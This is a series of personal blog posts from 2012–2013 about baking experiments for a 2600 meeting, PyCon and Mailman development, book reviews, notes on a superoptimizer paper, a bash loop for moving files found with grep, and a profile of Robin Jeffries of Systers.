The remaining cupcakes have been divided into two groups. One has been filled with googe and iced and placed in the fridge to age for 24h. After the time has elapsed, two prepared cupcakes will be removed from refrigeration and eaten by experimental subjects J and T. If they are deemed an improvement over the freshly assembled cupcakes, the rest of the batch will be prepared in a similar manner. After 48h have passed, experimental subjects will be able to compare 0-day cupcakes, 24h cupcakes, and 48h cupcakes. If the prepared cupcakes are deemed unsuitable at 24h (likely due to structural integrity failures), then the control batch will be left untouched until shortly before the 2600 meeting which will represent our larger clinical cupcake trial. This will not be a double-blinded experiment, although one could be conducted at a later date to more comprehensively test cupcake saturation over time.

Hypothesis 2: 400ml is way to much googe

Method: 400ml of googe solution has been prepared and will be inserted into cupcakes as described above. If the cupcakes cannot hold this amount of googe, the remainder will be given to the experimental subjects for consumption or further experimentation. We will report back on crowdsourced solutions for too much googe after the clinical trials are complete.

Cupcake Clinical Trial

If you wish to participate in this clinical cupcake trial, please attend the 2600 meeting at Quelab on Friday April 5, 2013. Please note that I have not obtained ethics approval for this experiment and you will be participating at your own risk.

comments

Back from Pycon!

Tue, 26 Mar 2013 06:04:10 GMT

I should write up a proper trip report with pictures and stuff, but as it's nearly midnight and I don't want my sleeping patterns to stay on California time, you get some short highlights:

1. The conference itself was awesome. Recall: I attended the sprints last year but not the main conference, so while I had high hopes I didn't know that the content would be so good. I attended a lot of great talks and no doubt missed quite a few as well. I'll be making heavy use of the conference recordings over the next little while, I expect.

2. I am really excited about my free raspberry pi. While I know lots of folk who frequently get given cool toys and told to go hack them, this is the first time someone has gifted me with such an item/mission, and it feels great. I haven't figured out what I'm going to do yet, but there was this great talk about hooking one up to a $300 CNC machine, and another great one about home automation that could be useful...

3. The sprints were super-productive! You can see our todo/completed/waiting list here if you want the nitty gritty. I'd been joking earlier to anyone who asked that we were totally going to release by Friday, and while we didn't do that, we *are* very close and you should all expect a beta release of postorius + Mailman 3 very soon. I can't wait to show it off!

4. Perhaps later I'll do up the stats on exactly what I was doing to our repository, but I should tell you that not only did I make plenty of my own code commits, but I also got to merge code from new contributors. This was totally my favourite part, seeing new folk get their code accepted and in the main tree. And it wasn't just the people who were physically at the sprints with us: I also merged code from people contributing remotely, most of whom are prospective GSoC students. Way to impress me, students!

5. I got to talk to a bunch of people about GSoC. I do this all the time by email, but it was especially fun to talk to folk in person about what's involved, why it's awesome, how to be good at it, and why they should sign up.

6. And post-con, I got a few days to catch up with friends in the area and visit the Japanese Tea Gardens in Golden Gate Park, which I've wanted to do ever since I read Seanan Mcguire's October Daye books. As I processed a few photos for this week's assignment, you get one here:

And with that, midnight has rung and it's bedtime. I have a long week of catch-up ahead of me at work, but expect some more pycon / mailman / gsoc posts out of me over the next little while as I internalize all the things I've been thinking about this past week.

comments

PyCon PyCon PyCon PyCon

Wed, 13 Mar 2013 17:45:15 GMT

I'm not leaving yet, but it's just becoming increasingly hard to think about anything else. Which is really unfortunate, because my deal to myself was that I'd work this week (which is spring break at UNM) in exchange for taking next week off for hacking.

So, uh, yeah, back to work now. :)

comments

My awesomely nerdy life

Fri, 01 Mar 2013 08:10:48 GMT

It's been a while since I just wrote about what I'm doing, so let me tell you about some of this week:

On Wednesday I...

... continued to run cool experiments on mutated software at work.
... went to see Cory Doctorow speak at the library.
... went out for falafel with some local hacklab folk.
... beat up an ingress portal with the help of my lvl 8 friend.

Today was less cool, what with the 2hr taxes-for-aliens session (not actually what they call it, but accurate enough), but I did make some coffee cupcakes with cream cheese icing.

I plan to feed those to my coworkers (partially to make fun of the fact that we ran out of coffee today. "Look, I brought coffee!") and anyone who shows up at the local 2600 meeting tomorrow.

Then, on Saturday I'm going to build stilts and hopefully learn to walk on them! Or more likely, bruise my knees a lot, but hey, can never learn if I don't try, right?

And on Sunday I'm playing a concert of predominantly Percy Grainger music (which is pretty music-nerdy), and then hopefully taking part in a meeting to start a local Hacker Scouts guild.

So yeah, I've mostly been living life rather than photographing it and posting about it lately, but it is a very awesome life and you should all be jealous, promise!

comments

Academic Notes: Superoptimizer -- A Look at the Smallest Program

Tue, 22 Jan 2013 23:45:46 GMT

Ages ago, I thought it would be a brilliant idea to write up stuff on the papers I read, much like I do book reviews, but then I promptly... didn't do it. But it's a new year with new papers, and here's the first for this year's seminar.

Photo: small toad by Scott* (Because tiny toads are adorable and compiler papers notes don't lend themselves to obvious illustration)

Superoptimizer -- A Look at the Smallest Program
Henry Massalin
1987

This is a neat little paper about optimizing assembly code. They took a program and then had the computer try to generate the smallest possible functionally equivalent version. The paper is super short and readable and filled with lots of very clever adding of registers and stuff to avoid program jumps and comparisons. They could get it to optimize only fairly small programs (12 lines of assembly), but it still seemed like a lot of these would be useful compiler optimizations and they're probably in use now.

Anyhow, it's three pages of explanation + two pages of cool examples they found, so if you're looking for a fun little bit of computing to read about to fill out some mind-expanding new year's resolution, this is an easy place to start.

Some questions we had in seminar that I don't know the answers to:

- What was the impact of this paper on modern compilers?
- Do we do any of this while compiling, or make use of the things they found in a preset kind of way?
- Has anyone tried to do this using modern computers / other assembly instruction sets?
- It seemed like there was a lot of adding... would it be possible to make reduced assembly instruction sets on the assumption that they will never be programmed by humans and thus can be super-optimal?

comments

Book review: Under Wraps

Mon, 21 Jan 2013 22:22:25 GMT

I haven't been keeping up with my book reviews here although I do add them to librarything and should probably just write myself an export script so it's easier for me. But whatever, that's not done yet, and I finished a book this afternoon while I was waiting for my experiment to run, so here it is.

Under Wraps (The Underworld Detection Agency Chronicles)
by Hannah Jayne

I liked the characters and the world of this funny urban fantasy, but they seemed almost out of sync with the murder that Sophie is supposed to be solving: the serial murder case seemed to take a back seat to the banter and internal monologuing of our somewhat hapless heroine. If you're looking for serious urban fantasy give this a miss, but it's fun in a first season Buffy sort of way. I'm not sure if it really grabbed me enough to read the next one, but who knows, maybe it'll grow into something more as the series expands?

comments

Winter Driving

Wed, 16 Jan 2013 19:59:37 GMT

I spent 3 weeks up in Ottawa, and the one thing I was looking forwards to was not having to do any more serious winter driving.

Guess what it was like here on Monday?

On the bright side, I'm glad people drive super carefully around here when they're uncertain. But it's very hard not to laugh when we're inching down the road over a light dusting of snow. Good thing I wasn't in a hurry!

comments

Happy Holidays!

Thu, 27 Dec 2012 05:32:24 GMT

Looking at my twitter feed, it seems I spent my holiday with my grandmother's dog, so here's a picture:

I've been having a lovely time with my parents and Buster the dog, all of whom like long walks in the local woods. My fitbit tells me their standard afternoon walk is just shy of 3 miles, which is still more meaningful to my not entirely metric parents than it is to me, but I'm slowly learning distances in imperial from living in the US. I spent the first few days in self-quarantine since John had finally infected me with the cold/flu he caught on the way back from St. Lucia, but to be honest all I did was sneeze on a TSA agent or two, have one miserable night when I arrived and then my immune system squashed it. Yeay immune systems! So I spent a few quiet reading and walking days that I probably didn't have to do to avoid being a disease vector, but it was lovely to read and walk and enjoy the local trails.

The next few days will be a bit more chaotic as I try to meet up with people while I'm in town. If you want to get on the list, let me know! My old canadian cell # is active if you want to get in touch, and I'll be in town 'till the 7th minus a few days at new year's as usual.

comments

Kindle Fire, take 3

Fri, 14 Dec 2012 20:03:05 GMT

You may recall that my Kindle Fire decided to stop charging right before I went off on my vacation at the beginning of December, and I had a somewhat terrible experience with Amazon's online customer service but they did in the end replace it under warranty.

I've had the replacement for two weeks, and it was acting a bit weird, rebooting while I was doing things like reading pdfs. So last night, I looked up whether this was a common problem and the suggestion seemed to be to hard reboot it, so I did.

The kindle has been stuck at the kindle fire reboot screen for about 12 hours now.

Since the online chat support was awful last time, I called Amazon this time and the phone support lady was very nice, efficient and was very apologetic about not being able to get me a new device until Jan 4th. But the replacement is in the works, I just won't get it 'till after I get back from Ottawa.

Meanwhile, dead kindle #2 won't boot up and also won't shut down, so I may be sticking a running device in the mail, which feels kind of weird. Not much for it, though, since the thing is utterly unresponsive. Maybe it'll run out of battery before I get out to mail it this afternoon.

comments

RFC Poetry

Wed, 28 Nov 2012 22:53:31 GMT

A friend of mine wrote a twitter bot that spits out random bits of RFCs, somewhat inspired by horse_ebooks, and I suggested it would be nice if it wrote haiku, so now it does. It's not very good at it, but I found this almost poem in the feed:

Townson makes it has
the switch functions
02 Elgamal public key

And now I really want to write a haiku including the words "elgamal public key" -- pity "exchange" doesn't fit that into a 7-syllable line.

Some of the more intentional poetry it's written:

to authenticate the
already done our paper we have
home address found

It's almost poignant. Or Yoda crossed with Glinda the good witch, whatever.

comments

On what I do

Tue, 20 Nov 2012 18:13:07 GMT

You may have seen this article on Peter G. Neumann: Killing the Computer to Save It. It was making the rounds a few weeks ago. (Note that you can read NYT articles without logging in if you turn on temporary cookies and then click the link.)

In case you were curious or maybe thought some of that sounded familiar, that is indeed the same DARPA grant that drew me to the US for this postdoc. I'm on CRASH or "Clean-Slate Design of Resilient Adaptive Secure Hosts." The article has a short mention of the stuff we're doing:

Clean Slate is financing research to explore how to design computer systems that are less vulnerable to computer intruders and recover more readily once security is breached.

Dr. Shrobe argues that because the industry is now in a fundamental transition from desktop to mobile systems, it is a good time to completely rethink computing. But among the biggest challenges is the monoculture of the computer “ecosystem” of desktop, servers and networks, he said.

“Nature abhors monocultures, and that’s exactly what we have in the computer world today,” said Dr. Shrobe. “Eighty percent are running the same operating system.”

Lessons From Biology

To combat uniformity in software, designers are now pursuing a variety of approaches that make computer system resources moving targets. Already some computer operating systems scramble internal addresses much the way a magician might perform the trick of hiding a pea in a shell. The Clean Slate project is taking that idea further, essentially creating software that constantly shape-shifts to elude would-be attackers.

That the Internet enables almost any computer in the world to connect directly to any other makes it possible for an attacker who identifies a single vulnerability to almost instantly compromise a vast number of systems.

But borrowing from another science, Dr. Neumann notes that biological systems have multiple immune systems — not only are there initial barriers, but a second system consisting of sentinels like T cells has the ability to detect and eliminate intruders and then remember them to provide protection in the future.

In contrast, today’s computer and network systems were largely designed with security as an afterthought, if at all.

That barely touches on all the cool stuff we're doing, since the article isn't exactly about our work at UNM & UVA, but it was pretty neat to see it in the news.

comments

More on Philosophy of Teaching

Thu, 15 Nov 2012 17:54:24 GMT

So, it turns out that not only do I dislike half the samples I can find online of good philosophy of teaching statements, I also hate everything I write on that front. But the deadline is today and my references have already sent in their letters, so I think I've just got to suck it up and submit what I have.

I am, however, pleased with the ideas in this paragraph on failure:

But perhaps the biggest lesson was about failure: Many students seemed to believe that any failure was a sign of fundamental, unfixable inadequacy, and this was especially toxic to the women and other minority students who were more likely to feel like imposters. But many self-taught programmers learn through experimentation and repeated failure, so we encouraged students to do this in tutorials and even celebrated ridiculous bugs together by encouraging the students to share them and help each other debug. The students who had difficulties at the beginning could see other students failing and then succeeding, and the change in their confidence levels was noticeable, as was the resulting change in what they attempted and what they achieved.

That's a little piece of what made teaching tutorials such a different experience from lecturing, and something I really loved watching happen every year.

comments

Book reviews: Darklandia

Wed, 31 Oct 2012 06:38:02 GMT

Darklandia by T.S. Welti

This is an amazing novel, a utopian-dystopian world and a teenager slowly becoming aware that the world around here is not as she's been led to believe. I found it reminiscent of young adult sci fi I loved as a kid, such as Devil on My Back by Monica Hughes, or more recent takes on the genre such as Maria V. Snyder's Inside Out. Perhaps Brave New World would be a closer match to the Felicity-medicated world in Darklandia, but this walks the careful line of feeling familiar without feeling unoriginal.

What blew me away the most is that even though I was noticing clues that should have led me to the shocking ending, I didn't make the connection until the very end. Masterfully done, and while I could see how others might feel unsatisfied, I thought it was brilliant.

It's quite the page turner: I caught myself finishing it hours past my bedtime. I highly recommend this one, especially to fans of this type of speculative/science fiction, just make sure not to start it too late in the evening!

I was fortunate enough to win this in a LibraryThing member giveaway, but regardless of how I obtained the book, I can honestly say that this is among the top books I've read this year... and it's nearly November! The rest of my reading list will have a lot to live up to.

comments

Home for a rest?

Mon, 22 Oct 2012 21:17:44 GMT

I'm mildly discombobulated since my flight got in quite delayed last night and I swear, there wasn't enough time between travel even though I had more than a week, but here's updates:

(1) GSoC Mentor Summit was amazing, filled with open source folk who were also passionate about mentoring. It was cool having lots in common with every person I talked to all weekend.

(2) I have pictures, largely of playing powerpoint karaoke yesterday. Also of some of the guys playing rugby in the hot tub. ;) (Well, okay, just tossing a ball around, but still!) They need some serious culling so expect most of them later in the week. Arc pulled the best ones off my camera and they're here: https://plus.google.com/u/0/109741359399131092509/posts/VHbodBCsBPJ (Thanks to Denis of Gentoo for being our photographer!)

(3) Oh yeah, the big announcement is that I'm going to be the Org admin for the Python Software Foundation next year. Doomed! So yeah, I go from managing my 3 students, 7 mentors for Mailman (and backup managing another 3 students from Systers), to around 30 students spread across a pile of sub-organizations. Should be fun. Or terrifying. :) I'll probably write more about this later once it's had more time to sink in.

(4) I need to also make time to encourage folk to come to Pycon. There is financial aid available and the application is up. I'm going to be sending more personal notes out to my new contributors from GHC12 and my GSoC students from Systers and Mailman. The Mailman sprint last year was probably the most satisfying hacking event I've ever attended, and I want others to have that experience. :)

(5) I did get all my GHC12 pictures up before I left: https://secure.flickr.com/photos/terrio/sets/72157631687919350/

(6) My last official GHC12 blog post (about the open source day hackathon) is pending now that I have photos to go with it. I've got notes for a few more, but not sure I'll have time to write them.

In theory, I'll be home in New Mexico and not traveling again 'till December. Which is good, because I need to put together academic applications, write a paper with my remaining thesis research (the tech report got cited twice already, which is a sign that I should have something more peer-reviewed out there), and get the research done for my next paper. Plus, you know, squash all the open bugs/add all the missing features in Postorius, make sure the port of dynamic sublists to Mailman 3 is finished, and purchase flights for my trip home in December.

I feel like I should be a lot more stressed about all that I've got on my plate, but after a weekend with open source folk, I'm feeling pretty relaxed and pleasant and like it's all going to work out somehow. And to be honest, that feeling may be the most important thing I'm bringing back from Mountain View this week. :)

comments

Moving files you found with grep (and the joy of for loops in bash)

Tue, 16 Oct 2012 21:06:41 GMT

Back in one of my early, unpaid co-op jobs, I discovered that my otherwise reasonably experienced boss hadn't ever used tab completion, and it got me thinking a lot about how I learned a lot of command line habits through a combination of word of mouth and a personal conviction that the computer should be able to do anything I found repetitive (alas, I have not taught it to load the dishwasher). But the real take-home message is that there's a lot of little linux tricks that aren't really obvious to everyone. So in that spirit, here's an incredibly tiny script I wrote today that might be useful to someone else:

Moving files found with grep

I had a bunch of output files from my experiments, and I wanted to know at a glance which ones had failed, and then move those files to a subdirectory, leaving me with a smaller list of successes to evaluate in more detail.

Here's the script as a one-liner, the way I'd enter it:
for a in `grep -l -z "No repair found" repair.debug.*` ; do echo $a; mv $a notfound/; done

And here's some explanation:

grep -l "No repair found" repair.debug.*

My particular experiment prints a line "No repair found" when the run fails, so that's what I'm searching for in the output files it generates (repair.debug.*). The -l makes grep print just the filenames so I don't have to do any special work to parse them from the output. (You can also use the longer but easier-to-read --files-with-matches. I'm guessing -l was intended as "l for list" but I don't know.)

When I was googling for the -l flag, I did find some people with fancy xarg stuff you could do here, but seriously, if all you need is the filename save yourself some hassle. If your filenames have spaces in them, you may find it useful to do that and some fanciness with -z to change the delimiters to be \0s, but I didn't need to do that.

for a in ` ... `; do ... ; done

This is my favourite little bash for loop with the functional bits cut out. It iterates over whatever you gave it in ` ... ` putting each item in $a as it goes through. In this case, each $a is one of the found filenames. You can do away with the backticks all together if you just want a list of filenames that you could get from ls, though. If I'd wanted to move all my repair.debug.* output files, I could have done for a in repair.debug.*; do mv $a output/; done -- no backticks! I do this all the time for moving files out of my way before I start a new experiment, using directories with the date to keep track of what ran when.

Another useful command to put in there other than a grep is `seq 10` which will give you a standard counted for loop that goes up to 10. Very useful when I want my computer run an experiment 10 times while I go to lunch!

echo $a
I almost always run a version of the loop with *just* "echo $a" in the middle before I make one that does anything, just as a sanity check to make sure I got the expression right and I am actually doing stuff to the right files. I usually leave it in the final version so I can scan the output easily and see what was done. Sometimes I actually output the whole command as an echo for debug purposes

mv $a notfound/

The easy part: moving each file that matched into my notfound/ directory.

And... there you have it! A quick way to move a set of files out of your way and a little bit about how to automate other repetitive tasks on the command line. Probably obvious to many, but who knows, maybe this is exactly the script that someone else needs.

comments

Ada Lovelace Day profile: Robin Jeffries, Her Systers Keeper Emeritus and HCI expert

Tue, 16 Oct 2012 10:43:19 GMT

Ada Lovelace Day aims to raise the profile of women in science, technology, engineering and maths by encouraging people around the world to talk about the women whose work they admire. This international day of celebration helps people learn about the achievements of women in STEM, inspiring others and creating new role models for young and old alike.

When I first met Robin Jeffries, I had no idea how important she was. My friend Jen said, "hey, you need to talk to Robin about this" and the three of us sat down and chatted about technical stuff for an hour or so in the middle of a busy conference. It didn't hit me until much later that I'd just spent a time geeking it up with a woman who half the women at GHC would have loved to shake hands with, let alone get a whole lunch with.

Robin has just retired as Her Systers Keeper, a role she took over from Anita Borg when Anita's health was failing. She's not wrong in calling managing a community like this a job of cat herding, but with her guidance Systers has long been a list with an unusually high signal to noise ratio, and one that many technical women turn to when they need advice, want to share a story, or want to rant about the latest news piece about women in computing. I started realizing how much of a role model Robin herself has been to so many when I'd mention her and people would go, "wait, you know Robin Jeffries? I've always wanted to meet her in person!" These were women who were inspired by the stories she shares and her ability to get to the heart of the matter when it comes to the experience of technical women.

I've been fortunate enough to work with Robin doing Google Summer of Code mentoring for Systers, where we've been doing modifications on an open source project dear to my heart, GNU Mailman. She's got an uncanny ability to find good chunks of technical work that our students can manage, a knack for inspiring the people she works with, a good system for managing us all and keeping us to our deadlines, and every time we sit down to talk about how to fix a problem she impresses me with her insights into better architectures and designs. I've rarely had the chance to work with someone of Robin's experience in human computer interaction (read her bio, but in short, she's crazy accomplished and I probably would have been way intimidated if I'd known how much so when I first met her). I'm constantly in awe of how easily she not only applies that experience, but how good she is at conveying it to others and how willing she is to share her skills.

We're probably all benefiting from her knowledge as she applies it to her job at Google, but it's the more direct personal experiences that really get me. For example, despite being in great demand with the Systers 25th anniversary celebrations at GHC12 this year, she came out to help me run Open Source Day activities for women interested in hacking with Systers and Mailman, quickly adopting a whole table of prospective volunteers and walking them through the first stages of evaluating and contributing to an open source project. She regularly makes me wish I'd spent more time studying HCI myself, and forces me to re-evaluate how I design software. We've got one big feature we want to see in Mailman and I'm really looking forwards to working with her on making it happen.

I admire Robin for her amazing technical expertise, for her support of women in computing, and for her ability to balance the two as part of her own busy life for so many years. It has most definitely been my privilege to work with such an amazingly talented woman, and I hope that some day I can approach her level of professional and personal accomplishment.

comments